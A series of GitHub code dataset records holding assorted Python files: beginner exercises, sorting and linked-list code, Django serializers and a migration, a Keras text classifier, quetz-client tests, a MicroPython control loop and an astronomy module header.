jogadas[f'Jogador_{i}'] = valor\n\n print(f'Jogador_{i} tirou {valor} no dado.')\n\n sleep(1)\n\nprint('-=' * 15)\nprint('== RANKING DOS JOGADORES ==')\n\nranking = sorted(jogadas.items(), key=itemgetter(1), reverse=True)\n\nfor i, v in enumerate(ranking):\n print(f'{i + 1}° lugar: {v[0]} com {v[1]}.')\n sleep(1)","repo_name":"bruno-gs/Python","sub_path":"Curso em video/Estruturas Compostas - M3/DICIONÁRIOS/ex091.py","file_name":"ex091.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16012339364","text":"#! 
/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport sys\nimport getopt\nimport toml\nimport json\ndef main(argv):\n inputfile = ''\n outputfile = ''\n try:\n opts, args = getopt.getopt(argv,\"hi:o:\",[\"ifile=\",\"ofile=\"])\n except getopt.GetoptError:\n print('json2toml.py -i -o ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('json2toml.py -i -o ')\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n inputfile = arg\n elif opt in (\"-o\", \"--ofile\"):\n outputfile = arg\n print(inputfile)\n print(outputfile)\n obj = json.load(open(inputfile, \"r\"))\n toml.dump(obj, open(outputfile, \"w\"))\n \nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"Miachol/configr","sub_path":"inst/extdata/json2toml.py","file_name":"json2toml.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"53"} +{"seq_id":"27463155511","text":"class Solution:\n def longestPalindrome(self, s: str) -> str:\n max_len = len(s)\n\n while max_len > 1:\n for i in range(0, len(s)-max_len + 1):\n substring = s[i: i + max_len]\n if substring == substring[::-1]:\n return substring\n max_len -= 1\n return (s[0] if s else '')\n\n\n","repo_name":"chen-qian-dan/LeetCode_Python","sub_path":"lc_05_Longest Palindromic Substring/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14031409810","text":"# DEDICATING TO SORTED ALGORITHMS\n\n'''Selection sort what is the runtime and inefficiences you see with the sorting algorithm after you implement it'''\n\n# [3,44,38,5,47,15,36,26,27,2,46,4,19,50,48]\ndef selection_sort(unsorted_arr):\n counter = 0 # Marking the number of iterations we have to go through\n wall = 0 # Represents all sorted elements up to that wall\n\n for index in range(0, len(unsorted_arr)): # For every element compare it to the rest of the elements have to draw a grid to analyze run time\n wall = index\n for inner_index in range(index + 1, len(unsorted_arr)): # current element to all elements after the sorted pile\n compared_element = unsorted_arr[inner_index] # Represents the unsorted element we are comparing the current element to\n\n # If we find a new current minimum while comparing then update the current minimum\n if compared_element < unsorted_arr[wall]: \n wall = inner_index\n # If or once we find the new current minimum we replace it with the element at the wall and start the next while loop iteration at wall + 1\n\n\n unsorted_arr[index], unsorted_arr[wall] = unsorted_arr[wall], unsorted_arr[index] # Make the swap and update wall for next while loop iteration\n\n return unsorted_arr\n\n# def selection_sort(A):\n\n# for i in range(len(A)):\n\n# wall = i # Set the wall at the current element \n# for compared_index in range(wall + 1, len(A)): # For the unsorted elements that occur after the wall just looking for a new minimum\n# print(compared_index,wall)\n# if A[compared_index] < A[wall]: # If the compared element we are on is bigger than the element at the wall we set the wall to be at that lower value index\n# wall = compared_index # Setting the wall at the newly found minimum\n\n# # Swap the found minimum element with\n# # the first element\n# A[i], A[wall] = A[wall], A[i]\n# print(A)\n# return A\n\n\n# print(selection_sort([29,10,14,37,14]))\n\n\n# [29,10,14,37,14\n\ndef insertion_sort(unsorted_arr):\n for index in range(1, len(unsorted_arr)): # For every 
element compare to the element behind it\n current_num = unsorted_arr[index]\n backtracing_index = index - 1 # Marks the element previous\n \n while current_num < unsorted_arr[backtracing_index]: # while the current element is less than the elements before it\n unsorted_arr[backtracing_index + 1] = unsorted_arr[backtracing_index] \n backtracing_index -= 1\n unsorted_arr[backtracing_index+1] = current_num \n return unsorted_arr\n # It is only swapping pairs\n\nprint(insertion_sort([3,38,44,5,47,15,36,26,27,2,46,4,19,50,48]))\n ","repo_name":"matthewharrilal/CS-Questions-GRIND","sub_path":"day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5426586742","text":"from django.contrib.auth.models import User\nfrom rest_framework import serializers, validators\n\nfrom .models import Cart, Category, Product, Product_Comment, Tag, Transaction, Wishlist\n\n\nclass TagSerializer(serializers.ModelSerializer):\n class Meta:\n model = Tag\n fields = \"__all__\"\n\n\nclass CategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = \"__all__\"\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n tag = TagSerializer(read_only=True, many=True)\n category = CategorySerializer(\"\")\n sellerName = serializers.CharField(source=\"seller.username\", read_only=True)\n\n class Meta:\n model = Product\n fields = \"__all__\"\n\n\nclass TransactionSerializer(serializers.ModelSerializer):\n buyerName = serializers.CharField(source=\"buyer.username\", read_only=True)\n sellerName = serializers.CharField(source=\"seller.username\", read_only=True)\n productName = serializers.CharField(source=\"product.name\", read_only=True)\n\n class Meta:\n model = Transaction\n fields = [\n \"id\",\n \"buyer\",\n \"seller\",\n \"product\",\n \"date\",\n \"buyerName\",\n \"sellerName\",\n \"productName\",\n ]\n\n\nclass ProductCommentSerializer(serializers.ModelSerializer):\n buyerName = serializers.CharField(source=\"buyer.username\", read_only=True)\n\n class Meta:\n model = Product_Comment\n fields = [\"id\", \"buyer\", \"comment\", \"rating\", \"buyerName\"]\n\n\nclass RegisterSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = (\"username\", \"password\", \"email\")\n extra_kwargs = {\n \"password\": {\"write_only\": True},\n \"username\": {\n \"required\": True,\n \"allow_blank\": False,\n \"validators\": [\n validators.UniqueValidator(\n User.objects.all(), f\"A user with that username already exists.\"\n )\n ],\n },\n }\n\n def create(self, validated_data):\n user = User.objects.create_user(\n username=validated_data[\"username\"],\n email=validated_data[\"email\"],\n password=validated_data[\"password\"],\n )\n return user\n\n\nclass WishlistSerializer(serializers.ModelSerializer):\n productName = serializers.CharField(source=\"product.name\", read_only=True)\n userName = serializers.CharField(source=\"user.username\", read_only=True)\n image = serializers.ImageField(source=\"product.image\", read_only=True)\n price = serializers.DecimalField(\n max_digits=7, decimal_places=0, source=\"product.price\", read_only=True\n )\n\n class Meta:\n model = Wishlist\n fields = \"__all__\"\n\n\nclass CartSerializer(serializers.ModelSerializer):\n productName = serializers.CharField(source=\"product.name\", read_only=True)\n userName = serializers.CharField(source=\"user.username\", read_only=True)\n seller = 
serializers.CharField(source=\"product.seller.id\", read_only=True)\n image = serializers.ImageField(source=\"product.image\", read_only=True)\n price = serializers.DecimalField(\n max_digits=7, decimal_places=0, source=\"product.price\", read_only=True\n )\n print(seller)\n\n class Meta:\n model = Cart\n fields = \"__all__\"\n","repo_name":"Bosh-Kuo/Database-2022-Fall","sub_path":"e_commerce_backend/app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29583002002","text":"from __future__ import unicode_literals\n\nimport apps.models\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"log_extract\", \"0016_tasks_ex_data\"),\n ]\n\n operations = [\n migrations.CreateModel(\n name=\"ExtractLink\",\n fields=[\n (\"link_id\", models.AutoField(primary_key=True, serialize=False, verbose_name=\"链路id\")),\n (\n \"link_type\",\n models.CharField(\n choices=[(\"common\", \"内网链路\"), (\"qcloud_cos\", \"腾讯云cos链路\")],\n default=\"common\",\n max_length=20,\n verbose_name=\"链路类型\",\n ),\n ),\n (\"operator\", models.CharField(max_length=255, verbose_name=\"执行人\")),\n (\"op_bk_biz_id\", models.IntegerField(verbose_name=\"执行bk_biz_id\")),\n (\n \"qcloud_secret_id\",\n apps.models.EncryptionField(\n blank=True, default=\"\", help_text=\"内网链路不需要填写\", null=True, verbose_name=\"腾讯云SecretId\"\n ),\n ),\n (\n \"qcloud_secret_key\",\n apps.models.EncryptionField(\n blank=True, default=\"\", help_text=\"内网链路不需要填写\", null=True, verbose_name=\"腾讯云SecretKey\"\n ),\n ),\n (\n \"qcloud_cos_bucket\",\n models.CharField(\n blank=True, default=\"\", help_text=\"内网链路不需要填写\", max_length=255, verbose_name=\"腾讯云Cos桶名称\"\n ),\n ),\n (\n \"qcloud_cos_region\",\n models.CharField(\n blank=True, default=\"\", help_text=\"内网链路不需要填写\", max_length=255, verbose_name=\"腾讯云Cos区域\"\n ),\n ),\n (\"is_enable\", models.BooleanField(default=True, verbose_name=\"是否启用\")),\n ],\n options={\n \"verbose_name\": \"提取链路\",\n \"verbose_name_plural\": \"提取链路\",\n },\n ),\n migrations.CreateModel(\n name=\"ExtractLinkHost\",\n fields=[\n (\"id\", models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name=\"ID\")),\n (\"target_dir\", models.CharField(default=\"\", max_length=255, verbose_name=\"挂载目录\")),\n (\"bk_cloud_id\", models.IntegerField(verbose_name=\"主机云区域id\")),\n (\"ip\", models.GenericIPAddressField(verbose_name=\"主机ip\")),\n (\"link\", models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=\"log_extract.ExtractLink\")),\n ],\n options={\n \"verbose_name\": \"链路中转机\",\n \"verbose_name_plural\": \"链路中转机\",\n },\n ),\n migrations.AddField(\n model_name=\"tasks\",\n name=\"cos_file_name\",\n field=models.CharField(blank=True, max_length=255, null=True, verbose_name=\"cos对象文件名称\"),\n ),\n migrations.AddField(\n model_name=\"tasks\",\n name=\"link_id\",\n field=models.IntegerField(blank=True, null=True, verbose_name=\"链路id\"),\n ),\n ]\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_extract/migrations/0017_auto_20201111_1050.py","file_name":"0017_auto_20201111_1050.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"6767643155","text":"from django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom 
..Packages.auth_api.PackageUpdate import add_package_update\nfrom ..DatabaseConnector import db_connection\n\nimport json\n\n##\n# Handels the product ID scan adds cureent location and time stamp info to the Database\n# #\n@csrf_exempt\ndef add_scan_info(request):\n conn=db_connection.get_connection()\n data=request.body.decode()\n code_dict=json.loads(data)\n print(code_dict)\n pkg_id=code_dict['pkg_id']\n longi=code_dict['longi']\n lati=code_dict['lati']\n ts=code_dict['ts']\n status= add_package_update.insert_product_tracking_info(conn, pkg_id, longi, lati, ts)\n return JsonResponse({'status': status})","repo_name":"batch11g6/SmartChain","sub_path":"SmartChain/RestAPI/RestAPI/API/UpdateProductScan/add_productscan_info.py","file_name":"add_productscan_info.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"521872041","text":"from tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense, Embedding, Dropout\nfrom sklearn.metrics import confusion_matrix, f1_score\n# 导入必要的库\nimport pandas as pd\nfrom util import *\nimport tensorflow as tf\n# 假设 read_data 返回的是DataFrame\ntrain_dataset = read_data('train.json')\n\n# 分词,并将分词结果存储在字典中\ntrain_tokenized_data = token_data(train_dataset.values)\n\n# 加载保存的Word2Vec模型\nloaded_model = Word2Vec.load(\"word2vec_model202311091711.model\")\n\n# 汉字通过word2vec数字化 Pad the feature vectors\nMAX_SEQUENCE_LENGTH = 250\n# 假设 padded_features_vector 是通过 get_features_vectors 获得的\npadded_features_vector = get_features_vectors(train_tokenized_data, loaded_model, MAX_SEQUENCE_LENGTH)\n\n# 将每个向量序列转换为列表,并确保它们保持原有顺序\nvector_list = [list(vector) for vector in padded_features_vector]\n\n# 创建一个包含所有向量的DataFrame\nvector_df = pd.DataFrame(vector_list)\n\n# 选取id和label_id列\nid_label_df = train_dataset[['id', 'label_id']]\n\n# 按顺序合并DataFrame\ncombined_df = pd.concat([id_label_df, vector_df], axis=1)\n\n# print(combined_df.shape)\n# print(combined_df.columns)\n# print(combined_df.head(1))# -----------------------------------\n\ntest_size=0.2\ntrain_set,test_set=split_dataset(combined_df,test_size=test_size)\n\n# 数据分割\nX_train,y_train, X_test, y_test =\\\n train_set.drop(['id', 'label_id'], axis=1),\\\n train_set['label_id'],\\\n test_set.drop(['id', 'label_id'], axis=1),\\\n test_set['label_id']\n\n\nprint('X_train',X_train.shape)\nprint('y_train',y_train.shape)\nprint('X_test',X_test.shape)\nprint('y_test',y_test.shape)\n\n# 假设 EMBEDDING_DIM 和 MAX_SEQUENCE_LENGTH 已经设置\nEMBEDDING_DIM = 300 # 根据Word2Vec模型的维度\nMAX_SEQUENCE_LENGTH = 250\n\n# Assuming your model is for sequence data and X_train, X_test are already feature vectors\nmodel = Sequential()\nmodel.add(LSTM(64, return_sequences=True, input_shape=(MAX_SEQUENCE_LENGTH, EMBEDDING_DIM)))\nmodel.add(Dropout(0.5))\nmodel.add(LSTM(32))\nmodel.add(Dense(36, activation='softmax')) # 36 classes\n\nmodel.compile(loss='sparse_categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\nmodel.summary()\n\n# No need for list comprehension if X_train and X_test are already correct shape\nX_train_list = [np.concatenate(list(row)) for index, row in X_train.iterrows()]\nX_train_array = np.array(X_train, dtype='float32')\n# X_test_list = [np.concatenate(list(row)) for index, row in X_test.iterrows()]\n# X_test_array = np.array(X_test_list, dtype='float32')\n# X_train_array = X_train.to_numpy()\n# X_test_array = X_test.to_numpy()\n\n# Train the model\nmodel.fit(X_train, y_train, epochs=10, 
batch_size=32, validation_split=0.2)\n\n# Evaluate the model\nloss, accuracy = model.evaluate(X_test, y_test)\nprint(\"Accuracy: {:.2f}%\".format(accuracy * 100))\n\n# Predictions\ny_pred = model.predict(X_test)\ny_pred_labels = np.argmax(y_pred, axis=1)\n\n# Performance evaluation\naccuracy = f1_score(y_test, y_pred_labels, average='macro')\ncm = confusion_matrix(y_test, y_pred_labels)\nprint('F1 Score:', accuracy)\nprint('Confusion Matrix:\\n', cm)","repo_name":"funing230/competition20241109","sub_path":"1111.py","file_name":"1111.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29236828492","text":"import sys\n\n#singly linked list\nclass Node:\n def __init__(self,val):\n self.val=val\n self.nxt=None\n\nclass LinkedList:\n def __init__(self,head=None):\n self.head=head\n\n #inserts value at tail of linked list\n def insertAtTail(self,data):\n node=Node(data)\n temp=self.head\n while temp.nxt is not None:\n temp=temp.nxt\n temp.nxt=node\n\n def removeDup(self):\n temp=self.head\n dictionary={}\n prev=None\n while temp is not None:\n #checks if key is in the dictionary\n if temp.val in dictionary:\n prev.nxt=temp.nxt\n #else, first occurrence so add to dictionary\n else:\n dictionary[temp.val]=None\n prev=temp\n temp=temp.nxt\n \n #finds the kth element from end of list\n def kth(self, k):\n if k<0:\n return None\n temp=self.head\n #move temp forward k spaces\n for i in range(k):\n if temp is None:\n print(\"no valid node exists\")\n return None\n temp=temp.nxt\n #could have exited for loop without reaching first error check\n #so must error check again\n if temp is None:\n print(\"no valid node exists\")\n return None\n elementToFind=self.head\n prev=None\n while temp.nxt is not None: \n temp=temp.nxt\n prev=elementToFind\n elementToFind=elementToFind.nxt\n print(\"the value found is %d\"%elementToFind.val)\n\n def size(self):\n temp=self.head\n size=0\n while temp is not None:\n size=size+1\n temp=temp.nxt\n print(\"size is %d\"%size)\n\nif __name__==\"__main__\":\n node = Node(2)\n ll=LinkedList(node) \n ll.insertAtTail(3)\n ll.insertAtTail(3)\n ll.insertAtTail(4)\n ll.insertAtTail(2)\n ll.kth(2)\n ll.size()\n","repo_name":"amyvalukonis/CrackingTheCodingInterview","sub_path":"CCI/2.2/kthElement.py","file_name":"kthElement.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4576856046","text":"import pytest\n\nfrom quetz_client.client import QuetzClient\n\nfrom .conftest import temporary_package_file\n\n\n@pytest.mark.parametrize(\n \"role\",\n [\n \"member\",\n \"maintainer\",\n \"owner\",\n ],\n)\ndef test_live_set_channel_member(\n live_client: QuetzClient,\n live_post_channel_a,\n role,\n):\n live_client.set_channel_member(\"alice\", role, \"a\")\n\n members = live_client.yield_channel_members(\"a\")\n\n assert any(m.user.username == \"alice\" and m.role == role for m in members)\n\n\ndef test_live_delete_channel_member(\n authed_session,\n live_client: QuetzClient,\n live_post_channel_a_members,\n):\n # Check that alice is a member of channel a\n channel = \"a\"\n username = \"alice\"\n\n response = authed_session.get(\n f\"{live_client.url}/api/channels/{channel}/members\",\n )\n assert {u[\"user\"][\"username\"] for u in response.json()} == {\"alice\", \"bob\"}\n\n live_client.delete_channel_member(username, channel)\n\n # Check that alice is no longer a member of channel 
a\n response = authed_session.get(\n f\"{live_client.url}/api/channels/{channel}/members\",\n )\n assert {u[\"user\"][\"username\"] for u in response.json()} == {\"bob\"}\n\n\ndef test_live_get_role(\n live_client: QuetzClient,\n live_alice_role,\n):\n actual_alice_role = live_client.get_role(\"alice\")\n assert next(actual_alice_role).role == live_alice_role\n\n\ndef test_live_post_file_to_channel(\n live_client: QuetzClient,\n live_post_channel_a,\n requests_mock,\n):\n # For some reason, we still need to explicitly tell requests_mock to\n # use the real http connection for this url.\n # I thought this would be avoided by using real_http=True in\n # live_client in conftest.py, but it's not.\n requests_mock.register_uri(\n \"GET\",\n \"https://conda.anaconda.org/conda-forge/linux-64/xtensor-0.16.1-0.tar.bz2\",\n real_http=True,\n )\n\n packages = live_client.yield_packages(\"a\")\n assert len(list(packages)) == 0\n\n with temporary_package_file() as file:\n live_client.post_file_to_channel(\"a\", file)\n\n packages = live_client.yield_packages(\"a\")\n\n assert any(p.name == \"xtensor\" for p in packages)\n","repo_name":"mamba-org/quetz-client","sub_path":"tests/test_live.py","file_name":"test_live.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"30441399835","text":"\r\n#from ulab import numpy as np\r\n\r\n#def tick(timer): # we will receive the timer object when being called\r\n# print(timer.counter()) # show current timer's counter value\r\n\r\n#tim = pyb.Timer(4, freq=1) # create a timer object using timer 4 - trigger at 1Hz\r\n#tim.callback(tick) \r\n\r\n# 0 = pyboard, 1 = teensy41\r\nnISR = 0\r\nN = 1000#<-- probably longer\r\nprint(\"N = %i\" % N)\r\n\r\nimport time\r\n\r\nfrom machine import Timer\r\nfrom machine import Pin\r\n\r\nsw_pin = Pin(40, mode=Pin.OUT)\r\nled = Pin(13, mode=Pin.OUT) # enable GP16 as output to drive the SW_PIN\r\nled.off()\r\n\r\np2 = Pin(21, mode=Pin.OUT)\r\np3 = Pin(22, mode=Pin.OUT)\r\np4 = Pin(23, mode=Pin.OUT)\r\n\r\n\r\nisr_state = 0 \r\nisr_happened = 0\r\n\r\ndef tick(timer): # we will receive the timer object when being called\r\n #print(timer.counter()) # show current timer's counter value\r\n #pyb.LED(2).toggle()\r\n global sw_pin, isr_happened, nISR\r\n if sw_pin.value():\r\n sw_pin.off()\r\n else:\r\n sw_pin.on()\r\n\r\n isr_happened = 1\r\n nISR += 1\r\n \r\n\r\ndef mysat(vin):\r\n if vin > 255:\r\n return 255\r\n elif vin < -255:\r\n return -255\r\n else:\r\n return vin\r\n\r\n# set up i2c\r\nfrom machine import I2C\r\n\r\ni2c = I2C(2, 400_000)\r\n\r\n# - pend uno address\r\n# - mega address\r\nmega_address = 0x07\r\nuno_address = 0x08\r\n\r\nfrom ulab import numpy as np\r\n\r\nimport upybd as pybd\r\n# create blocks\r\nu = pybd.pulse_input(amp=200, on_ind=10, off_ind=200)\r\nline_sense = pybd.i2c_sensor()\r\nencoder = pybd.i2c_sensor()\r\nv_nom = pybd.constant_input(amp=0)\r\nadd1 = pybd.addition_block()\r\nsub1 = pybd.subtraction_block()\r\nG = pybd.cart_pendulum_upy(line_sense, encoder, i2c, \\\r\n send_address=mega_address, \\\r\n read_address1=mega_address, \\\r\n read_address2=uno_address)\r\n# open-loop pulse test in a straightline (but with no sensor to drive\r\n# 
straight)\r\nadd1.set_input_block1(v_nom)\r\nadd1.set_input_block2(u)\r\n\r\nsub1.set_input_block1(v_nom)\r\nsub1.set_input_block2(u)\r\n\r\n\r\nG.set_input_block1(add1)\r\nG.set_input_block2(sub1)\r\n\r\n\r\nu.init_vectors(N)\r\nline_sense.init_vectors(N)\r\nencoder.init_vectors(N)\r\nG.init_vectors(N)\r\nadd1.init_vectors(N)\r\nsub1.init_vectors(N)\r\n\r\n\r\n\r\ni2c_send_array = bytearray([3,0,0,0,0])\r\ntwos_comp_offset = 2**16\r\n\r\n# check line calibration status and calibrate if necessary\r\ncal = G.check_cal()\r\nprint(\"cal: %i\" % cal)\r\n\r\nif cal == 0:\r\n # send calibration command over i2c\r\n G.send_cal_command()\r\n for i in range(20):\r\n time.sleep_ms(500)\r\n cal = G.check_cal()\r\n print(\"i = %i, cal = %i\" % (i, cal))\r\n if cal == 1:\r\n break\r\n\r\n\r\n#data = np.zeros((N,3),dtype=np.int16)\r\n#data = np.zeros((N,6),dtype=np.int16)\r\n\r\n\r\nKp = 2\r\nenc = 0\r\n\r\nnISR = 0\r\n\r\ntim = Timer(1, mode=Timer.PERIODIC, callback=tick, freq=500)\r\n\r\n\r\nt0 = time.ticks_us()\r\n\r\n# start test command here\r\nG.start_test()\r\n\r\n\r\nfor i in range(N):\r\n #pin_A15.on()\r\n while (isr_happened == 0):\r\n # wait for next interrupt\r\n time.sleep_us(10)\r\n #pin_A15.off()\r\n\r\n # square wave that toggles each time step\r\n if isr_state == 1:\r\n isr_state = 0\r\n p2.off()\r\n else:\r\n isr_state = 1\r\n p2.on()\r\n\r\n p3.on()\r\n # clear flag\r\n isr_happened = 0\r\n\r\n u.find_output(i)\r\n add1.find_output(i)\r\n sub1.find_output(i)\r\n G.send_commands(i)\r\n G.find_output(i)\r\n \r\n p3.off()\r\n\r\n\r\nt1 = time.ticks_us()\r\nloop_time = t1 - t0\r\nprint(\"loop_time = %s\" % loop_time)\r\n\r\n# weird stop approach\r\n\r\n# stop test command here\r\nG.stop_test()\r\n\r\ntim.deinit()\r\n\r\n\r\n## for row in data:\r\n## #print(\"%i, %i, %i\" % (row[0],row[1],row[2]))\r\n## row_str = \"\"\r\n## for i, elem in enumerate(row):\r\n## if i > 0:\r\n## row_str += \",\"\r\n## row_str += str(elem)\r\n## print(row_str)\r\n\r\n\r\n## n_echo = data[:,2]*256 + data[:,3]\r\n## dn = n_echo[1:] - n_echo[0:-1]\r\n## print(\"dn max = %i\" % np.max(dn))\r\n\r\n## for i, ent in enumerate(dn):\r\n## if ent != 1:\r\n## print(\"bad dn: %i, %i\" % (i, ent))\r\n\r\n","repo_name":"ryanGT/sabbatical_github","sub_path":"micropython/teensy_cart_pendulum_control/main_backup_manual/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71767500967","text":"import pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\npage = requests.get(\"https://forecast.weather.gov/MapClick.php?lat=34.099695000000054&lon=-118.33539999999999#.XpmUC2JR3tQ\")\nsoup = BeautifulSoup(page.content, \"html.parser\")\nweek = soup.find(id=\"seven-day-forecast-body\")\nitems = week.find_all(class_=\"tombstone-container\")\n# print(items[0])\n#\n# print(items[0].find(class_=\"period-name\").get_text())\n# print(items[0].find(class_=\"short-desc\").get_text())\n# print(items[0].find(class_=\"temp\").get_text())\n\nperiod_names = [item.find(class_=\"period-name\").get_text() for item in items]\nshort_desc = [item.find(class_=\"short-desc\").get_text() for item in items]\ntemp = [item.find(class_=\"temp\").get_text() for item in items]\n\nweather = pd.DataFrame(\n {\n \"period\": period_names,\n \"short_descriptions\": short_desc,\n \"temperatures\": temp,\n 
})\nprint(weather)\nweather.to_csv(\"weather.csv\")\n\n","repo_name":"yKuzmenko740/Web_Scraping_practice","sub_path":"web_practice.py","file_name":"web_practice.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34571259994","text":"from concurrent.futures import ThreadPoolExecutor\nfrom .commons import org, db\nimport functools\n\nfrom .models.schema import File, Test, HandledPull, TestCount, Repo\nfrom .app_init import app\n\ndef needs_app_context(f):\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n with app.app_context():\n return f(*args, **kwargs)\n\n return wrapper\n\nclass LearningTask(object):\n\n def __init__(self):\n self.executor = ThreadPoolExecutor(max_workers=1)\n self.future = None\n\n def load_pulls(self, repo_name, direction='desc', stop_on_handled=True):\n if self.future and self.future.running():\n return \"Error: The previous task is still running\"\n\n self.future = self.executor.submit(self._do_load_pulls, repo_name, direction, stop_on_handled)\n return \"Started task!\"\n\n @needs_app_context\n def _do_load_pulls(self, repo_name, direction, stop_on_handled):\n repo_id = self._get_repo_id_from_name(repo_name)\n repo = org.get_repo(repo_name)\n for pull in repo.get_pulls('all', direction=direction):\n if self._is_pull_handled(pull, repo_id):\n if stop_on_handled:\n break\n else:\n continue\n files = self._get_files(pull, repo_id)\n tests = self._get_tests(pull)\n self._count_tests_for_files(files, tests)\n\n def _get_tests(self, pull):\n test_set = set()\n for comment in pull.get_issue_comments():\n c = comment.body\n if c.startswith(\"test \") and c.endswith(\" please\"):\n c = c[5:-7]\n tests = c.replace(\",\", \"\").split()\n test_type = \"integration\"\n if \"cucumber\" in tests:\n test_type = \"cucumber\"\n for test_name in tests:\n if test_name not in [\"cucumber\", \"integration\"]:\n test = self._get_or_create_test(test_name, test_type)\n test_set.add(test)\n\n return test_set\n\n def _get_files(self, pull, repo_name):\n files_set = set()\n for f in pull.get_files():\n file = self._get_or_create_file(f._filename.value, repo_name)\n files_set.add(file)\n return files_set\n\n def _count_tests_for_files(self, files, tests):\n if len(files) == 0 or len(tests) == 0:\n return\n for f in files:\n for t in tests:\n test_count = db.session.query(TestCount).filter_by(file_id=f.id, test_id=t.id).first()\n if not test_count:\n test_count = TestCount(file_id=f.id, test_id=t.id, count=1)\n db.session.add(test_count)\n else:\n test_count.count = test_count.count + 1\n db.session.expire_on_commit = False\n db.session.commit()\n\n def _get_or_create_file(self, path, repo_id):\n file = db.session.query(File).filter_by(path=path, repo_id=repo_id).first()\n if not file:\n file = File(path=path, repo_id=repo_id)\n db.session.add(file)\n db.session.expire_on_commit = False\n db.session.commit()\n return file\n\n def _get_or_create_test(self, name, type):\n test = db.session.query(Test).filter_by(name=name, type=type).first()\n if not test:\n test = Test(name=name, type=type)\n db.session.add(test)\n db.session.expire_on_commit = False\n db.session.commit()\n return test\n\n def _is_pull_handled(self, pull, repo_id):\n handled_pull = db.session.query(HandledPull).filter_by(pull_id=pull.id, repo_id=repo_id).first()\n if not handled_pull:\n handled_pull = HandledPull(pull_id=pull.id, repo_id=repo_id)\n db.session.add(handled_pull)\n db.session.expire_on_commit = False\n 
db.session.commit()\n return False\n return True\n\n def _get_repo_id_from_name(self, repo_name):\n repo = db.session.query(Repo).filter_by(name=repo_name).first()\n if not repo:\n repo = Repo(name=repo_name)\n db.session.add(repo)\n db.session.expire_on_commit = False\n db.session.commit()\n return repo.id","repo_name":"Guy-Lev/Takalushk","sub_path":"app/learning_task.py","file_name":"learning_task.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"856002317","text":"from __future__ import division, print_function\n\n## Import General Tools\nimport sys\nimport os\nimport re\nimport stat\nimport shutil\nimport datetime\nif sys.version_info.major == 2:\n import subprocess32 as subprocess\nelif sys.version_info.major == 3:\n import subprocess\nimport logging\nimport yaml\nimport math\nimport numpy as np\nimport pymongo\nfrom pymongo import MongoClient\n\n\n## Import Astronomy Specific Tools\nimport ephem\nimport astropy.units as u\nimport astropy.io.fits as fits\nimport astropy.coordinates as coords\nimport astropy.table as table\nimport astropy.wcs as wcs\nimport astropy.io.ascii as ascii\n\n\n__version__ = '1.5.2'\n\n\n##-----------------------------------------------------------------------------\n## Mode Function\n##-----------------------------------------------------------------------------\ndef mode(data, binsize):\n '''Function to calculate the mode of a distribution given the distribution\n and a binsize.\n \n Parameters\n ----------\n data : list\n list of values to be analyzed\n\n binsize : float\n size of the bins in to which the data will be sorted\n \n Returns\n -------\n (n, center) : tuple\n tuple containing the number of data points in the most common bin (n)\n and the central value of that bin (center)\n '''\n bmin = math.floor(min(data)/binsize)*binsize - binsize/2.\n bmax = math.ceil(max(data)/binsize)*binsize + binsize/2.\n bins = np.arange(bmin,bmax,binsize)\n hist, bins = np.histogram(data, bins=bins)\n centers = (bins[:-1] + bins[1:]) / 2\n foo = zip(hist, centers)\n return max(foo)[1]\n\n\nclass TelescopeConfigError(Exception):\n pass\n\n##-----------------------------------------------------------------------------\n## Define Telescope object to hold telescope information\n##-----------------------------------------------------------------------------\nclass Telescope(object):\n '''Object which contains information about the telescope which took the\n Image (see IQMon.Image object definition).\n \n Parameters\n ----------\n config_file : string\n Path to the configuration file to be read. The telescope properties are\n definied when a configuration 